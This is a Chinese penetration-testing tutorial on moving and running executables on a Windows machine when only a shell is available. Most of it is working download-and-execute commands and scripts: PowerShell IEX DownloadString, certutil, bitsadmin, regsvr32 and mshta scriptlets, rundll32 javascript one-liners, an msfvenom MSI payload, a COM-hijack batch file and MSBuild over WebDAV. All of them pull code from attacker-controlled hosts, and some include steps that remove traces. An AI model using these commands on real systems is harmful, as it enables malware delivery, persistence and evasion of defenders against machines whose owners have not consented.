Win下终端实现文件上传和下载执行

时间:2022-07-28
本文章向大家介绍Win下终端实现文件上传和下载执行,主要内容包括其使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。

注意:本文分享给安全从业人员,网站开发人员和运维人员在日常工作中使用和防范恶意攻击,请勿恶意使用下面描述技术进行非法操作。

[TOC]

0x00 前言

描述:作为一个网络安全从业者,您可能会常常在渗透测试中遇到只有一个Shell情况下如何将可执行文件上传到一台windows机器上(主要由于没有界面操作),我在实际渗透测试中将我的经验和方法进行分享;

0x01 方式

(1) debug

描述:debug是一个程序调试工具功能包括:直接输入,更改,跟踪,运行汇编语言源程序,观察操作系统的内容看ROM BIOS的内容,观察更改RAM内部的设置值,以扇区或文件的方式读写软盘数据;

debug使用思路:把需要上传的exe转换成十六进制hex的形式,通过echo命令将hex代码写入文件,使用debug功能将hex代码还原出exe文件。 Debug它还有一个功能可以将十六进制代码转换为可执行文件

实际测试利用kali中的exe2hex.exe 

exe2hex -x demo.exe 
[*] exe2hex v1.5.1
[i] Outputting to /root/demo.bat (BATch) and /root/demo.cmd (PoSh)
[+] Successfully wrote (BATch) /root/demo.bat #cmd执行
[+] Successfully wrote (PoSh) /root/demo.cmd #powershell执行

$debug > 内容复制粘贴到cmd命令行下依次执行
-r 
-q 退出
或者直接执行bat即可
./demo.bat

#关键语句
debug /?
#判断debug是否存在
if NOT %ERRORLEVEL% == 0 echo &echo &echo &echo **** **** **** **** ****&echo *** Missing DEBUG.exe ***&echo **** **** **** **** ****&exit /b
echo n demo.0>demo.hex
echo e 0100>>demo.hex
echo 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00>>demo.hex
debug<demo.hex
move /Y demo.0 demo.exe
echo. >demo.hex
del /F /Q demo.hex demo.0
dir demo.exe

WeiyiGeek.

补充说明:

  • 生成的demo.cmd可以采用Powershell来进行hex转成为exe可执行文件

WeiyiGeek.

注意事项:

  • Debug在Win7以上不自带了需要去官网下载DOSBox程序与debug.exe程序;

WeiyiGeek.

(2) FTP

描述:搭建好ftp服务器利用文本记录FTP命令进行下载 

echo open 192.168.1.1 21> ftp.txt
echo ftp >> ftp.txt
echo bin >> ftp.txt
echo ftp >> ftp.txt
echo GET text.exe >> ftp.txt
echo del test.exe >> ftp.txt  #毁尸灭迹
ftp -A -s:ftp.txt          
#-A 匿名登录 PUT上传文件 GET下载文件 BIN 在上传和下载文件使用

WeiyiGeek.

以匿名用户为例,我们去配置文件vsftpd.conf 里面如下: 

#Vsftpd:Example config file /etc/vsftpd.conf
anon_upload_enable=YES
anon_mkdir_write_enable=YES
local_root=/var/www/html
chroot_local_user=YES
anon_root=/var/www/html

注:初次使用ftp下载防火墙会弹框拦截,使用前记得要先添加防火墙规则

(3) VBS-WScript.exe

描述:您永远都不知道VBS强大,话说MYSQL作者写的第一行代码就是采用VBS写的; downloader使用msxml2.xmlhttpadodb.stream对象统统联合 

#按顺序依次执行后会生成download.vbs,然后执行download.vbs即可实现下载ssss2.exe
Set Post = CreateObject("Msxml2.XMLHTTP")
Set Shell = CreateObject("Wscript.Shell")
Post.Open "GET","http://10.10.10.101/text.txt",0  #请求出文档内容
Post.Send()
​
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1   #binary
aGet.Open()
aGet.Write(Post.responseBody)   #将文档内容写到文件之中
aGet.SaveToFile "C:text.txt",2
​
#-----------------------------------------------------------#
echo Set Post = CreateObject("Msxml2.XMLHTTP") >>download.vbs
echo Set Shell = CreateObject("Wscript.Shell") >>download.vbs
echo Post.Open "GET","http://192.168.174.145/ssss2.exe",0 >>download.vbs
echo Post.Send() >>download.vbs
​
echo Set aGet = CreateObject("ADODB.Stream") >>download.vbs
echo aGet.Mode = 3 >>download.vbs
echo aGet.Type = 1 >>download.vbs
echo aGet.Open() >>download.vbs
echo aGet.Write(Post.responseBody) >>download.vbs
echo aGet.SaveToFile "C:testupdatessss2.exe",2 >>download.vbs

补充VBS下载脚本:

使用 Usage 帮助:cscript //nologo C:inetpubwwwrootwget.vbs 远程地址 保存文件名 

#vbs脚本开始
Set oHttp = CreateObject("MMC20.Application")
a=oHttp.Document.ActiveView.ExecuteShellCommand("calc.exe","d:","","Minimized")
'View.ExecuteShellCommand( _
  'ByVal Command As String, _
  'ByVal Directory As String, _
  'ByVal Parameters As String, _
  'ByVal WindowState As String _
')
​
echo iRemote=LCase(Wscript.Arguments(0)) >>C:\wget.vbs
echo iLocal=LCase(Wscript.Arguments(1)) >>C:\wget.vbs
echo wscript.echo "[!]GET ",iRemote >>C:\wget.vbs
​
echo set xPost=CreateObject("Microsoft.XMLHTTP") >>C:\wget.vbs
echo xPost.Open "GET",iRemote,0 >>C:\wget.vbs
echo xPost.Send() >>C:\wget.vbs
​
echo set sGet=CreateObject("ADODB.Stream") >>C:\wget.vbs
echo sGet.Mode=3 >>C:\wget.vbs
echo sGet.Type=1 >>C:\wget.vbs
echo sGet.Open() >>C:\wget.vbs
echo sGet.Write xPost.ResponseBody >>C:\wget.vbs
echo sGet.SaveToFile iLocal,2 >>C:\wget.vbs
(4) Powershell.exe

描述:这个也是windows下渗透必备利器; 

powershell(new-object System.Net.WebClient).DownloadFile('http://127.0.0.1/test.js','D:text.txt')
#下面都是直接执行;(后面可以加参数)
powershell "IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1/test.js')"
powershell IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1/1.bat')

使用 powershell 脚本上传 psexec.exe 到目标机器 

#方式1
echo $client = New-Object System.Net.WebClient > script.ps1
echo $targetlocation = "http://192.168.56.102/PsExec.exe" >> script.ps1
echo $client.DownloadFile($targetlocation,"psexec.exe") >> script.ps1
​
​
#方式2:在powershell中表示目录wget.ps1 
$storageDir=$pwd  
$webclient=New-Object System.Net.WebClient 
$url="http://10.11.0.79/payload/mp_64.exe" 
$file="mp_64.exe" 
$webclient.DownloadFile($url,$file) 

#绕过脚本执行的几种方式:
powershell.exe -ExecutionPolicy Bypass -NonInteractive -File script.ps1
PowerShell.exe -ExecutionPolicy Bypass -File .runme.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

powershell中的利用测试系统安装Office软件,下载执行dll对应的powershell代码如下: 

$path="D:testmsg1.dll"
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg.dll  $path
$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application"))
$excel.RegisterXLL($path)

方式3:将hex转换成为exe可执行文件 

C:UsersWeiyiGeekDesktop>echo | set /p="5f636f6f6b696500" 1>>demo.hex
C:UsersWeiyiGeekDesktop>powershell -Command "$h=Get-Content -readcount 0 -path './demo.hex';$l=$h[0].length;$b=New-Object byte[] ($l/2);$x=0;for ($i=0;$i -le $l-1;$i+=2){$b[$x]=[byte]::Parse($h[0].Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);$x+=1};set-content -encoding byte 'demo.exe' -value $b;Remove-Item -force demo.hex;"
(5) csc.exe

微软.NET Framework 中的C#编译器,Windows系统中默认包含,可在命令行下将cs文件编译成exe 

//c# downloader的代码为:
C:WindowsMicrosoft.NETFrameworkv4.0.50727csc.exe /out:C:download.exe C:download.cs
​
//C:download.cs 代码:
using System.Net;
namespace downloader
{
    class Program
    {
        static void Main(string[] args)
        {
            WebClient client = new WebClient();
            string URLAddress = @"http://192.168.174.145/ssss2.exe";
            string receivePath = @"C:testupdate";
            client.DownloadFile(URLAddress, receivePath + System.IO.Path.GetFileName
        (URLAddress));
        }
    }
}

注:csc.exe的绝对路径要根据系统的.net版本来确定

(6) JScript

描述:相比于JSRat中用的Scripting.FileSystemObject换用ADODB.Stream实现起来更加简单高效

以下代码依次保存为js文件,直接执行即可实现下载文件 

var Object = WScript.CreateObject("MSXML2.XMLHTTP");
Object.open("GET","http://127.0.0.1/1.bat",false);
Object.send();
if (Object.Status == 200)
{
    var Stream = WScript.CreateObject("ADODB.Stream");
    Stream.Open();
    Stream.Type = 1;
    Stream.Write(Object.ResponseBody);
    Stream.SaveToFile("C:\1.bat", 2);
    Stream.Close();
}

WeiyiGeek.

(7) rundll32.exe

描述:有时路径要加 防止转义,合并成rundll32的一句话(类似于JSRat的启动方式): 

rundll32.exe javascript:"..mshtml,RunHTMLApplication ";document.write();Object=new%20ActiveXObject("Microsoft.XMLHTTP");Object.open("GET","http://192.168.174.145/ssss2.exe",false);Object.send();if(Object.Status==200){Stream=new%20ActiveXObject("ADODB.Stream");Stream.Open();Stream.Type=1;Stream.Write(Object.ResponseBody);Stream.SaveToFile("C:\test\update\ssss2.exe",2);Stream.Close();}

执行命令进行打开我们上传的软件:

WeiyiGeek.

IE就是要允许Active脚本活动,其他默认不支持Active自己需要更改配置. 

<script>
a=new ActiveXObject("WScript.Shell");
a.run('%windir%\System32\cmd.exe /c calc.exe', 0);
window.close();
</script>
(8) hta

描述:添加最小化和自动退出hta程序的功能,执行过程中会最小化hta窗口,下载文件结束后自动退出hta程序 以下代码保存为.hta文件: 

<html>
<head>
    <!--代码与Jsscript相同-->
    <script>
    var Object = new ActiveXObject("MSXML2.XMLHTTP");
    Object.open("GET","http://192.168.174.145/ssss2.exe",false);
    Object.send();
    if (Object.Status == 200)
    {
        var Stream = new ActiveXObject("ADODB.Stream");
        Stream.Open();
        Stream.Type = 1;
        Stream.Write(Object.ResponseBody);
        Stream.SaveToFile("C:\test\update\ssss2.exe", 2);
        Stream.Close();
    }
    window.close();
    </script>
    <HTA:APPLICATION ID="test" WINDOWSTATE = "minimize">
</head>
<body>
</body> 
</html>
(9) bitsadmin.exe

描述:下载远程文件并保存指定目录(这里是用户的Download的目录:%Userprofile%Downloads) 

> bitsadmin /transfer Downloadjob /download /priority normal http://www.c.cn/logo.gif  %Userprofile%Downloadspng.gif
bitsadmin /transfer n1 /download /priority normal http://127.0.0.1/test.js  C:q.zip.js

WeiyiGeek.

#metasploit > meterpreter > shell:
C:Windows>bitsadmin /transfer Downloadjob /download /priority normal http://10.7.45.37/sb360.exe %systemroot%back.exe
C:Windows>back.exe
back.exe

WeiyiGeek.

(10) regsvr32.exe
#采用注册表的方式还是比较新颖的
regsvr32 /u /s /i:http://site.com/js.png scrobj.dll

#js.png代码:
<?XML version="1.0"?>
<scriptlet>
<registration
    progid="ShortJSRAT"
    classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
    <!-- Learn from Casey Smith @subTee -->
    <script language="JScript">
        <![CDATA[
            ps  = "cmd.exe /c calc.exe";
            new ActiveXObject("WScript.Shell").Run(ps,0,true);
        ]]>
</script>
</registration>
</scriptlet>
(11) mshta.exe
mshta http://site.com/calc.hta
mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
​
#payload.sct:
<?XML version="1.0"?>
<scriptlet>
<registration
    description="Bandit"
    progid="Bandit"
    version="1.00"
    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
    remotable="true"
    >
</registration>
​
<script language="JScript">
<![CDATA[
        var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>


#calc.hta
<HTML> 
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <HEAD> 
    <script language="VBScript">
        Window.ReSizeTo 0, 0
        Window.moveTo -2000,-2000
        Set objShell = CreateObject("Wscript.Shell")
        objShell.Run "calc.exe"
        self.close
    </script>
<body>
    demo
</body>
</HEAD> 
</HTML>
(12) certutil.exe

描述:certutil在渗透测试中的应用,对cmd下downloader的实现方法作补充。 certutil 用于备份证书服务管理,支持xp-win10;更多操作说明见https://technet.microsoft.com/zh-cn/library/cc755341(v=ws.10).aspx

#保存在当前路径,文件名称和下载文件名称相同
certutil -urlcache -split -f http://127.0.0.1/current.inf

#保存在当前路径,指定保存文件名称
certutil -urlcache -split -f http://127.0.0.1/current.inf demo.inf

#保存在缓存目录,名称随机
certutil -urlcache -f 

#战场清理(缓存清理)
查看缓存项目:certutil.exe -urlcache *
certutil -urlcache -f http://127.0.0.1/current.inf delete

WeiyiGeek.

(13) msiexec

描述:msiexec是一个windows installer MSI的安装程序

msfvenom -f msi -p windows/exec CMD=calc.exe > cacl.png msiexec /q /i http://site.com/payloads/calc.png

(14) IEExec.exe

C:WindowsMicrosoft.NETFrameworkv2.0.50727> caspol -s off C:WindowsMicrosoft.NETFrameworkv2.0.50727> IEExec http://site.com/files/test64.exe

WeiyiGeek.

(15) EXPLORE.exe

描述:这个需要IE存在可执行命令的漏洞(exp可以使用类似ms14_064) “C:Program FilesInternet ExplorerIEXPLORE.EXE” http://site.com/exp

(16) Cscript/Wscript

cscript //E:jscript webdavserverfolderpayload.txt

(17) ​Regasm/Regsvc

描述: dll可以使用C#写的

C:WindowsMicrosoft.NETFramework64v4.0.30319regasm.exe /u webdavserverfolderpayload.dll

(19) 第三方软件下载

这里介绍的思路是可先通过bitsadmin来下载第三方工具,然后利用第三方工具进行传输文件

1)wget bitsadmin /transfer n http://www.interlog.com/~tcharron/wgetwin-1_5_3_1-binary.zip C:testupdatewget.zip 运行后会下载wget的压缩包wget.zip 注:Windows系统默认不包含解压缩zip文件的命令,但是可以通过vbs来实现解压缩zip文件 vbs实现解压缩,以下代码保存为.vbs文件: 

UnZip "C:testupdatewget.zip","C:testupdatewget"
Sub UnZip(ByVal myZipFile, ByVal myTargetDir)
    Set fso = CreateObject("Scripting.FileSystemObject")
    If NOT fso.FileExists(myZipFile) Then
        Exit Sub
    ElseIf fso.GetExtensionName(myZipFile) <> "zip" Then
        Exit Sub
    ElseIf NOT fso.FolderExists(myTargetDir) Then
        fso.CreateFolder(myTargetDir)
    End If
    Set objShell = CreateObject("Shell.Application")
    Set objSource = objShell.NameSpace(myZipFile)
    Set objFolderItem = objSource.Items()
    Set objTarget = objShell.NameSpace(myTargetDir)
    intOptions = 256
    objTarget.CopyHere objFolderItem, intOptions
End Sub

成功解压缩后就可通过wget.exe来传输文件

C:testupdatewgetwget.exe http://192.168.174.145/ssss2.exe

WeiyiGeek.

2) ftfp 思路同上,先通过bitsadmin下载tftp.exe,然后利用tftp传输文件 

bitsadmin /transfer n http://www.winagents.com/downloads/tftp.exe C:testupdatetftp.exe
​
tftp -i 192.168.174.151 GET tftpssss2.exe C:testupdatessss2.exe

WeiyiGeek.

3)Python

相当于把Python脚本进行base64编码然后重新解码执行 

python -c "import urllib2; exec urllib2.urlopen('http://site.com/abc').read();"

import base64; exec base64.b64decode("aW1wb=")

WeiyiGeek.

4)msxsl.exe

msxsl https://evi1cg.me/scripts/demo.xml https://evi1cg.me/scripts/exec.xs

demo.xml:
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="exec.xsl" ?>
<customers>
<customer>
<name>Microsoft</name>
</customer>
</customers>
​
​
exec.xsl:
<?xml version='1.0'?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
xmlns:user="http://mycompany.com/mynamespace"> <!--关键点-->
  
<msxsl:script language="JScript" implements-prefix="user">
   function xml(nodelist) {
    var r = new ActiveXObject("WScript.Shell").Run("cmd /c calc.exe");
    return nodelist.nextNode().xml;
   }
</msxsl:script>
<xsl:template match="/">
   <xsl:value-of select="user:xml(.)"/>
</xsl:template>
</xsl:stylesheet>

5)pubprn.vbs 描述:下载劫持com的sct的批处理文件

WeiyiGeek.

cscript /b C:WindowsSystem32Printing_Admin_Scriptszh-CNpubprn.vbs 127.0.0.1 script:https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct

#test.sct
<?XML version="1.0"?>
<scriptlet>
<registration
    description="Bandit"
    progid="Bandit"
    version="1.00"
    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
    remotable="true"
    >
</registration>
​
<script language="JScript">
<![CDATA[
        var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
​
</scriptlet>

test.bat(这里批处理是利用到certutil下载sct文件劫持com弹出计算器): 

@echo off
reg add HKEY_CURRENT_USERSOFTWAREClassesBandit.1.00 /ve /t REG_SZ /d Bandit /f 1>nul 2>&1
reg add HKEY_CURRENT_USERSOFTWAREClassesBandit.1.00CLSID /ve /t REG_SZ /d {00000001-0000-0000-0000-0000FEEDACDC} /f 1>nul 2>&1
reg add HKEY_CURRENT_USERSOFTWAREClassesBandit /ve /t REG_SZ /d Bandit /f 1>nul 2>&1
reg add HKEY_CURRENT_USERSOFTWAREClassesBanditCLSID /ve /t REG_SZ /d {00000001-0000-0000-0000-0000FEEDACDC} /f 1>nul 2>&1
reg add HKEY_CURRENT_USERSOFTWAREClassesCLSID{00000001-0000-0000-0000-0000FEEDACDC} /ve /t REG_SZ /d Bandit /f 1>nul 2>&1
reg add HKEY_CURRENT_USERSOFTWAREClassesCLSID{00000001-0000-0000-0000-0000FEEDACDC}InprocServer32 /ve /t REG_SZ /d C:WINDOWSsystem32scrobj.dll /f 1>nul 2>&1
reg add HKEY_CURRENT_USERSOFTWAREClassesCLSID{00000001-0000-0000-0000-0000FEEDACDC}InprocServer32 /v ThreadingModel  /t REG_SZ /d Apartment /f 1>nul 2>&1
reg add HKEY_CURRENT_USERSOFTWAREClassesCLSID{00000001-0000-0000-0000-0000FEEDACDC}ProgID /ve /t REG_SZ /d Bandit.1.00 /f 1>nul 2>&1
reg add HKEY_CURRENT_USERSOFTWAREClassesCLSID{00000001-0000-0000-0000-0000FEEDACDC}ScriptletURL /ve /t REG_SZ /d https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct /f 1>nul 2>&1
reg add HKEY_CURRENT_USERSOFTWAREClassesCLSID{00000001-0000-0000-0000-0000FEEDACDC}VersionIndependentProgID /ve /t REG_SZ /d Bandit /f 1>nul 2>&1
reg add HKEY_CURRENT_USERSOFTWAREClassesCLSID{372FCE38-4324-11D0-8810-00A0C903B83C}TreatAs /ve /t REG_SZ /d {00000001-0000-0000-0000-0000FEEDACDC} /f 1>nul 2>&1

certutil 1>nul 2>&1
reg delete HKEY_CURRENT_USERSOFTWAREClassesBandit.1.00 /f 1>nul 2>&1
reg delete HKEY_CURRENT_USERSOFTWAREClassesBandit /f 1>nul 2>&1
reg delete HKEY_CURRENT_USERSOFTWAREClassesCLSID{00000001-0000-0000-0000-0000FEEDACDC} /f 1>nul 2>&1
reg delete HKEY_CURRENT_USERSOFTWAREClassesCLSID{372FCE38-4324-11D0-8810-00A0C903B83C}TreatAs /f 1>nul 2>&1
echo Done!

0x02 补充方式

描述:采用当使用UNC/WebDAV时候多的几种姿势可以利用其来执行可执行脚本 

cmd.exe /k < \webdavserverfolderbatchfile.txt (不能复现)

#pcalua.exe:
pcalua.exe -a \serverpayload.dll

#Msbuild
cmd /V /c "set MB="C:WindowsMicrosoft.NETFramework64v4.0.30319MSBuild.exe" & !MB! /noautoresponse /preprocess \webdavserverfolderpayload.xml > payload.xml & !MB! payload.xml"

0x04 参考来源

https://evi1cg.me/archives/remote_exec.html

随机文章
本站知识点必读
最近更新